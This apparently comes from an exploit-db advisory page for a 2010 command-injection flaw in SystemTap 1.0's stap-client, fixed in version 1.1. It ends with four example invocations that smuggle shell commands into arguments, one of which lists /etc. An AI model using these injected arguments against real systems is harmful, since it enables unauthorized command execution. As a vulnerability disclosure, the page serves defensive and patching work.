Lucene search

K
exploitdbFrank Ch. EiglerEDB-ID:33535
HistoryJan 15, 2010 - 12:00 a.m.

SystemTap 1.0 - 'stat-server' Arbitrary Command Injection

2010-01-1500:00:00
Frank Ch. Eigler
www.exploit-db.com
12

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/37842/info

SystemTap is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.

Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application.

Versions prior to SystemTap 1.1 are vulnerable. 


The following example commands are available:

stap-client \; ...
stap-client -; ...
stap-client -D 'asdf ; ls /etc' ...
stap-client -e 'script' -D 'asdf ; \; '